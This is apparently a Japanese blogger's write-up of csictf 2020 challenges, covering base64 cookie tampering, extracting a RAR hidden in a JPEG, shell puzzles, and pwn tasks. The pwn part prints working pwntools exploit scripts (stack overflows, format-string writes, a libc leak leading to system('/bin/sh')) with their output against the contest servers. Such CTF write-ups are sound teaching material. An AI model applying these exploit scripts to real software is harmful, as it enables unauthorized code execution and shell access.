csictf 2020: Write up
Web
oreo
nephewがチョコレートオレオを食べたいようです。
flavour: c3RyYXdiZXJyeQ==
HTTPリクエストをみてみると、Cookieのflavourという値にbase64でエンコードされた文字列があります。
kali@kali:~$ echo -n 'c3RyYXdiZXJyeQ==' | base64 -d strawberry
デコードしてみると、strawberryがでてきたのでこれをchocolateに変えてbase64でエンコードしリクエストすればいいことがわかります。
kali@kali:~$ echo -n 'chocolate' | base64 Y2hvY29sYXRl
% curl -H 'Cookie: flavour=Y2hvY29sYXRl' http://chall.csivit.com:30243/ csictf{1ick_twi5t_dunk}
FORENSICS
Gradient sky
$ binwalk sky.jpg DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 JPEG image data, JFIF standard 1.01 30 0x1E TIFF image data, little-endian offset of first image directory: 8 918 0x396 JPEG image data, JFIF standard 1.01 295038 0x4807E RAR archive data, version 5.x
binwalkコマンドで画像ファイルになにか埋め込まれていないかを確認するとrarが埋め込まれていそうです。
$ dd if=sky.jpg of=sky.rar skip=295038 ibs=1 95+0 records in 0+1 records out 95 bytes copied, 0.000171087 s, 555 kB/s
ddコマンドをつかって抽出します。
$ ls sky.jpg sky.rar
$ unrar x sky.rar UNRAR 5.61 beta 1 freeware Copyright (c) 1993-2018 Alexander Roshal Extracting from sky.rar Extracting ls.txt OK All OK
$ cat ls.txt csictf{j0ker_w4snt_happy}
LINUX
AKA
$ nc chall.csivit.com 30611 user @ csictf: $ id uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) user @ csictf: $ ls ________________________________________ / Don't look at me, I'm just here to say \ \ moo. / ---------------------------------------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || user @ csictf: $ bash -i ls flag.txt script.sh start.sh cat flag.txt csictf{1_4m_cl4rk3_k3nt}
find32
sshでサーバに接続したあとにサーバからflagを探せ、という問題でした。
user1@find32-f54b9d779-bwcv9:~$ ls 02KG7GI3 4LMTFZCM 80TD6MQ1 BH13PMF2 FOGK2TD9 JL8V5YGI M45WG887 OVB0C2DD ST1FTYFZ W56UYZUK 02M95EZJ 4LYTO0ZG 82R7NE45 BP1QOD2S FPLW13DY JM035B27 M4PSP87C OXNCWNKP STYTHKQE W7N3EQ8A 041Q5VQ6 4NE1DLAV 84XR0NUK BRKQC7KI FUF4GEJ2 JMXU733Y M50MK22L P7U25CJI SWD8ZKVQ W8XHJP69 0K8HTQUI 4O0KVR5P 89JKXHMI BT4Q0KSC G18VV3XH JNTGVLSL M6MO9M1W P7ZSATBS SXRZ25DU WFLCEXOU 0L51GUQ6 4UOCNFI8 8AYM8OQ9 BUIYBJW6 G20VWPOJ JQJIA3QC M8XE7P73 P8H2QJZE T0ST0WFT WHYUOJS2 0POE7NLS 4VTQDZXG 8BHHDOCA BW90182E G4DRQMVC JSWT0A61 MAC4PGYS PBMIEOJ1 T5D06H6O WO7DKKIR 0XC8TJL6 526KAB1Q 8DCJBGN8 BZE1NCWY GBIA0FJJ JW5DHBI2 MDZE1NQC PF2KOY3A THW3C7CC WQYZVZ02 10KS7XSL 5669QKVZ 8O23G30S C1KDRW2G GCCH7GUL JYP14B13 MIN0CJNB PJU5YNCE TIE17JV7 WW5L7JNK 17HSIYXQ 5714I59N 8Q8IDTC7 C5L2LOAA GGK14ZEP K5HIYP7U MITS1KT3 PKEIXGTL TNGM39LQ WXW4GEDU 1DB6A3RZ 5D8MSKXV 8SQP2JFV C75ZYB8Q GN72VYNY K7H88QI2 MLNCZNJH PLE8FFL4 TNNLXAMK X1SVRUTM 1EBY9SNN 5DNAUH8Z 90ORMN66 C7LAWJCM GVAUVIPU K80WPMFB MLRX5NHC PM7NRHP0 TOD5ZOWV X23268R9 1TE2UPR9 5DY1KZDZ 931P2T2C C9EN38OZ GVTHMJMC K8670JAD MT0ZF01M PMWQY71J TP72DLYC X44EBTIV 1VQPZIUO 5E0OD9MJ 95NBR36B CB7VL2AM H782K0GF KDT49C2O MVYJ08ZU PN7VNWMY TQYI4JH2 X4O9C3E9 1W6RAWEU 5FOOLY10 99KWRIDG CR8AY5W7 H7PWE6D1 KJ26BDR0 MWE4SJWL PRIT98R2 TY2N5W2V X70F203P 21X763CW 5HQTP051 9EO10QRH CVDGAH14 HI1HXC9E KOIIQDDB N56AGDMY PUKTT71A TZ4TM4KC XA6HG1VW 24CHFLCM 5OWRFEZT 9KHTQSOG CYNFLG1O HJ7SLXWJ KQFVQJ3J N8O0W1UR PX7XX8MV U1HE6HJU XAGJI6C3 24UQMOA7 5S7QF3H6 9KQEWTD4 D01U0OA5 HKX85U5A KRNKFQTK N9ZX32OP PXR9X9H1 U1Z144SU XBJ59Z81 2FFS4207 5ZCQW7TK 9KVDBM8O DC953402 HL9OQ59W KRTDDSYK NDR9IE07 Q3VV2P04 U4CT6S3M XESS84R7 2L9WVOQA 66SLWGGM 9LNZ0ETP DHI6XKWG HTFON23U KTE9QN31 NGT5TVLI QBZ2NYYY U9KXZUZT XM6M6XV3 2MMNROKS 6IGISUOK 9MP89P4E DQZAE7MY HW9ZGUI0 KUNZ9OP2 NJJ4FIMD QDDZKQBI UFF3VJES XVXM67UN 2X82259Q 6IS45I48 9QNUXM4L DVRULQ4L HWR8ILW8 L25P2X6S NMMNMEDT QDZM9GU3 UFRWO7LV XZ5KZZPR 31H6U39X 6JFHFM48 9R6FWLZQ E2DCKTAW I0GJ1ZT2 L6RJI5MH NNGY3F51 QON3WELD UI3CYXEH Y0WAA0QK 32DJSRCD 6JJ8M6EQ 9SMDHC89 E2WWNK1U I0HK3F0Q L97LN1SA NQ3BFZKH QV763DK6 UK268DBR Y2F5YYPT 36VMK9BG 6KPKMW7F 9TM8NR4D E3VMO1UV I3QH2SGS L9HIBPO9 NTIJFZDS QXKDIR8P UMVACDSG Y41T1L0P 3B2F652L 6NZ8YTHN 9UGJX4Z2 EBGAB2T7 I7BE5SNQ L9NCYUOA NWAG08DF QYBFIDQA UOKCOUPN YB6CGUEN 3C71HLAH 6O893R7P 9X0BSFFX EDL1IX5Y I7BYYSUH LA28D194 NXH2E4FB QYKLAVOR USP8NX9I YGAD81HL 3CWSG1VM 6TQAQ9JL 9YN7B5TM EJKM4P8J IHGA1LHQ LB4B6X6P O08K936H QZBKI0LI UTNI6PSD YI5ISTTI 3E7ZTAVL 6Y96J42D A202VRDJ EMAPY1SV INUIDPFZ LDMDGEL4 O20W8JF2 R3O1QJRE V8A4PPEG YI9VPU71 3FSO4YLX 71PCO4II A8DWWULS EMOTUDML ISW6FLPB LF6NHZRK O8C1K8CS R513RF7X VCSYBT6V YJ4H3LH9 3MPI6ZGG 74EIPRM5 A9ARPBTE EPIGX1NO IUKF08Y4 LIVI4VP2 OA9OWQNN R75LDKZA VFFKFKFP YJPL7KY5 3NI0KD8T 784MLE5E AK1L1RB0 EUXTE3IX IW0M1T97 LKLQLQ8B OAVKKSIU RHZ4QIGE VL8QUY6U YLTYQ7PT 3O7SZPP5 79VJFIU5 AK6PZX3H EXVHNHYF IXLBEBRX LKUM0ZLZ OB0TZRYT RSA9B4XA VOAZ2FLA YZOFT123 3SF18NHO 7EA2V52Y AL2HOE1I EYN874N3 IYLAWPCR LP29J6MU OHGWT0IT RXHHGT3D VQHX8Y2S Z8TPG2SQ 3WJNQHOI 7IKIFVQC ATP6Z1LV F4K726ZE IYT9TNZ3 LQWDHMT1 OI290XGJ RYRXFTD0 VS2QLP5T ZE0LYP1J 3Y6ULSYJ 7JKVQ1V4 AYHI7FZG F5FFWSP3 J634H910 LR9H9RJ4 OJTT5YOZ S3CQF12S VS5RKUTC ZIIFJZRE 40HE4X61 7K2HS4Y8 AZBQ6DI4 F9T58X71 J9K0N1G3 LS1E6E8N OLHQ2XMI S50ORS2M VU7UXE91 ZKOYMDBL 41W0HO2L 7O0E74NI AZF6YNNW FH0FGQU9 JBNLA5LS M0ODDGTQ OM4BZRJ6 S9796BM8 VUU3IP28 ZOM1L6RA 4DXWEUAK 7QQAKH41 BAL0FX4Y FI9WZ1NI JCUBGZ0L M2D9A9GW OO08I86R SA13FEFE VWXNPY8W ZUIZ3BRS 4E5VZT6C 7UB67288 BDMSPZFU FJATAT6I JD8K3921 M2W3FH21 OPTKWTEN SGCS15D7 VYXH92ZI ZXWG1CJB 4FMGJMPX 7UYWYDBZ BDYM2DL3 FMZXZWMD JDVT05Q1 M40WA6L0 OTQLM9FR SSNMEO7G W569XUGK ZYSF9F0A
user1でログインしてホームディレクトリを見てみると大量のファイルがあったのでとりあえず、grepコマンドでcsictfを検索してみることにします。
$ grep --color=always "csictf" * 〜省略〜 csictf{not_the_flag}{user2:AAE976A5232713355D58584CFE5A5}WOQS75G7TVPTTN3RBXGK96HGINKCRZ1Z8JP6N44KC02C9E8QWWTA2HW61CHPMKIZEZ6MYFR7N2WKVK93G5NBFEYYIGLUVXWK8NB3OZ06NLJVLRL6AXEXCYV6Z00CMPDPA7TU0G2CCRI5XNEEZQ79ZKC8B9WF0R79KX5X0EO0SVR8DLK7A5E4ZUO0A4ZYSP3DMENRTSIYRBP77ENRO94R3YWYGV154YX23Z6GY9V4U1ARL3PDFU6XO9RZOLJEJ1XXRR97HRV6TBSITPQ563V7GAAQSAPVY01KD8OSOQ1A78NJN0U4LRQN2ONQ0RTNO51W3227SH1BRGKC1SF9J8N72PMYIKMNJLE1XIH36AR3XU22NRTBTWOKEL9S1JT0THW0YF8MGC22RUERM34LLBI6B0EVMZKTE231NH9LTJBMKIABUXQ9CVZWTGIM2PFUNDFZVJSG14WO8W5FCJ1G6H1VXM1HP8Z92LY98JSYW2WDTHZVWF2AWZGTIY3OIOK0SEVIUOZT1Z41QS0C3W7FTRJEOZ3V3NDY517A48030C1362BNZHSZXYOF1CMANHQ408M9FF5R2Z9HC5BCDSKFLHAB3YFJ414WXCIOSPSY18323WYJL2FG0JHJA1ULW3M1KB4VXNWOV6MYU5YV88WJ8L03OO6738R50LI8XKHFR0TDVSFNEVRG95LBPMNUMRLP315YU6JMK4H5IF4B1P4N1J5YATTL6FFU9EMH99XUPEWXHH8TOZ4LBEFKGBS0LJMBRA6HULPB147O4DWNUALAOYY3VTXEUUT6CQL48PBB65AOU88UXDS5GHANP9A2XKF1MRRFTHJWLNEP3TMSK61ETIY82OS6GRYFQ5A6PXAVIWCSNT1H5CBBBDP9E2UOEVQBOOI2U27RQY4UU5QEY6GX75E72RO7RYESFMQR14LT1IS605XI4J5U7TYZN6NCIN2HH2WWU
csictf{not_the_flag}{user2:AAE976A5232713355D58584CFE5A5}
csictf{not_the_flag}はflagではないのですが、{user2:AAE976A5232713355D58584CFE5A5}のほうがクレデンシャル情報っぽいのでuser2にアカウントを切り替えてみます。
user2@find32-55bc4b84d5-zgx7k:~$ ls -al total 3708 drwxr-x--- 1 root user2 4096 Jul 17 23:09 . drwxr-xr-x 1 root root 4096 Jul 19 03:50 .. -rwxr-x--- 1 root user2 756782 Jul 17 23:08 adgsfdgasf.d -rwxr-x--- 1 root user2 756782 Jul 17 23:08 fadf.x -rwxr-x--- 1 root user2 756782 Jul 17 23:08 janfjdkn.txt -rwxr-x--- 1 root user2 756782 Jul 17 23:08 notflag.txt -rwxr-x--- 1 root user2 756798 Jul 17 23:08 sadsas.tx
そして、ホームディレクトリを見てみるといろいろなファイルがあります。
sadsas.txだけサイズが違うことに気づき、diffコマンドで他のファイルとの差分を求めたらflagっぽい文字列がでてきてそれがflagでした。
user2@find32-55bc4b84d5-zgx7k:~$ diff notflag.txt sadsas.tx 42391a42392 > th15_15_unu5u41
PWN
pwn intended 0x1
適当にBOFさせたらflagがでてきました。
pwn intended 0x2
$ file pwn-intended-0x2 pwn-intended-0x2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=3fe5fe06984f7093c9122fb1b08fb834a63784d4, for GNU/Linux 3.2.0, not stripped
$ checksec ./pwn-intended-0x2 [*] '/home/kali/csi_ctf_2020/pwn_intended_0x2/pwn-intended-0x2' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled
0x00000000004011ad <+87>: lea rax,[rbp-0x30] 0x00000000004011b1 <+91>: mov rdi,rax 0x00000000004011b4 <+94>: mov eax,0x0 0x00000000004011b9 <+99>: call 0x401060 <gets@plt> 0x00000000004011be <+104>: lea rdi,[rip+0xe6c] # 0x402031 0x00000000004011c5 <+111>: call 0x401030 <puts@plt> 0x00000000004011ca <+116>: cmp DWORD PTR [rbp-0x4],0xcafebabe 0x00000000004011d1 <+123>: jne 0x4011f0 <main+154> 0x00000000004011d3 <+125>: lea rdi,[rip+0xe66] # 0x402040 0x00000000004011da <+132>: call 0x401030 <puts@plt> 0x00000000004011df <+137>: lea rdi,[rip+0xe8a] # 0x402070 0x00000000004011e6 <+144>: mov eax,0x0 0x00000000004011eb <+149>: call 0x401050 <system@plt>
gdbでデバッグしてみると、gets関数でrbp-0x30から入力させたあとにrbp-0x4に入ってる値が0xcafebabeかどうか比較して0xcafebabeであればsystem関数が呼ばれるようです。
gdb-peda$ p/d 0x30-0x4 $1 = 44
$ python solve.py [*] '/home/kali/csi_ctf_2020/pwn_intended_0x2/pwn-intended-0x2' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [+] Opening connection to chall.csivit.com on port 30007: Done [*] Switching to interactive mode Welcome to csictf! Where are you headed? Safe Journey! You've reached your destination, here's a flag! csictf{c4n_y0u_re4lly_telep0rt?}
pwn intended 0x3
$ file pwn-intended-0x3 pwn-intended-0x3: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=65cafe283997ada7631398451f05273dd0002567, for GNU/Linux 3.2.0, not stripped
$ checksec ./pwn-intended-0x3 [*] '/home/kali/csi_ctf_2020/pwn_intended_0x3/pwn-intended-0x3' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
gdb-peda$ pdisas flag Dump of assembler code for function flag: 0x00000000004011ce <+0>: push rbp 0x00000000004011cf <+1>: mov rbp,rsp 0x00000000004011d2 <+4>: lea rdi,[rip+0xe5f] # 0x402038 0x00000000004011d9 <+11>: call 0x401030 <puts@plt> 0x00000000004011de <+16>: lea rdi,[rip+0xe7b] # 0x402060 0x00000000004011e5 <+23>: call 0x401050 <system@plt> 0x00000000004011ea <+28>: mov edi,0x0 0x00000000004011ef <+33>: call 0x401070 <exit@plt>
from pwn import * e = ELF('./pwn-intended-0x3') p = remote('chall.csivit.com',30013) flag_addr = e.symbols['flag'] ret_addr = 0x0040101a payload = 'A'*40 payload += p64(ret_addr) payload += p64(flag_addr) p.sendline(payload) p.interactive()
$ python solve.py [*] '/home/kali/csi_ctf_2020/pwn_intended_0x3/pwn-intended-0x3' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [+] Opening connection to chall.csivit.com on port 30013: Done [*] Switching to interactive mode Welcome to csictf! Time to teleport again. Well, that was quick. Here's your flag: csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}[*] Got EOF while reading in interactive
secret society
$ nc chall.csivit.com 30041 What is the secret phrase? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Shhh... don't tell anyone else about AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,csivit{Bu!!er_e3pl01ts_ar5_5asy}
global-warming
$ file global-warming global-warming: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=a8349c997968a84bfa8b253e0f9a3f9349cc1538, for GNU/Linux 3.2.0, not stripped
$ checksec ./global-warming [*] '/home/kali/csi_ctf_2020/Global_Warming/global-warming' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)
1番簡単ななFSBの問題でした。
from pwn import * e = ELF('./global-warming') #p = process('./global-warming') p = remote('chall.csivit.com',30023) payload = fmtstr_payload(12,{e.symbols['admin']: p32(0xb4dbabe3)}) p.sendline(payload) p.interactive()
$ ./global-warming AAAA%12$x AAAA41414141 $ python solve.py [*] '/home/kali/csi_ctf_2020/Global_Warming/global-warming' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) [+] Opening connection to chall.csivit.com on port 30023: Done [*] Switching to interactive mode � ; \xb2 \x00-/., csictf{n0_5tr1ng5_@tt@ch3d}
Smash
$ file hello hello: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=b1b4310a5ac288241657cbfade8806251eeb2a87, not stripped
$ ./hello What's your name? AAAA%1$x Hello, AAAA41414141!
libc.soファイルが渡され、GOTのアドレスを求めてlibcのアドレスをリークしたあとにsystem('/bin/sh')を実行するだけです。
from pwn import * e = ELF('./hello') libc = ELF('./libc.so.6') #p = process('./hello') p = remote('chall.csivit.com',30046) print p.recvuntil('name?\n') payload = fmtstr_payload(1,{e.got['free']:e.symbols['_start']}) p.sendline(payload) print p.recvuntil('name?\n') payload = 'A'*136 payload += p32(e.symbols['printf']) payload += p32(e.symbols['_start']) payload += p32(e.got['printf']) p.sendline(payload) print p.recvline() ret = u32(p.recvline()[:4]) libc_base_addr = ret - libc.symbols['printf'] system_addr = libc.symbols['system'] + libc_base_addr binsh_addr = next(libc.search("/bin/sh")) + libc_base_addr payload = 'A'*136 payload += p32(system_addr) payload += 'AAAA' payload += p32(binsh_addr) p.sendline(payload) p.interactive()
$ python solve.py [*] '/home/kali/csi_ctf_2020/Smash/hello' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) [*] '/home/kali/csi_ctf_2020/Smash/libc.so.6' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [+] Opening connection to chall.csivit.com on port 30046: Done What's your name? Hello, % 9 n\x17\x04\x14\x04\x15\x04! What's your name? Hello, system: 0xf7e0b956 /bin/sh: 0xf7f2a111 What's your name? Hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`\x84\x04�\x10\x04! ret: 0xf7e1a030 [*] Switching to interactive mode Hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP\xb9��AAAA\x0b��! $ id uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) $ ls ctf.xinetd flag.txt hello start.sh $ cat flag.txt csictf{5up32_m4210_5m45h_8202}